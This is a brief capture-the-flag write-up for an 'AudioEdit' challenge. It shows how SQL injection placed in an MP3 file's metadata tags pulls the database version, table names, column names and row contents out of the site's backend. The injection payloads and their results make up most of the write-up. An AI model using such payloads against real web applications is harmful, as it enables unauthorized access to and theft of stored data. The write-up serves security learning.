Recently Updated
AudioEdit
Challenge I made a cool site to edit audio files. Can you exploit it?
Solution The website lets you upload mp3 files and then displays some metadata and plays it for you.
It has to be a valid mp3 file
We try if we can put SQL injection in the exifdata and indeed we can: (exiftool doesn’t do exifdata updates for mp3 so we used easytag)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
foo', (SELECT VERSION())) -- -
> Author: foo
> Title: 5.5.49-0ubuntu0.14.04.1
foo', (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())) -- -
> Author: foo
> Title: audioedit
foo', (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='audioedit')) -- -
> Author: foo
> Title: id,file,author,title
foo', (SELECT GROUP_CONCAT(CONCAT(id, ':', file, ':' , author, ':' , title )) FROM audioedit)) -- -
> error inserting into database
Flag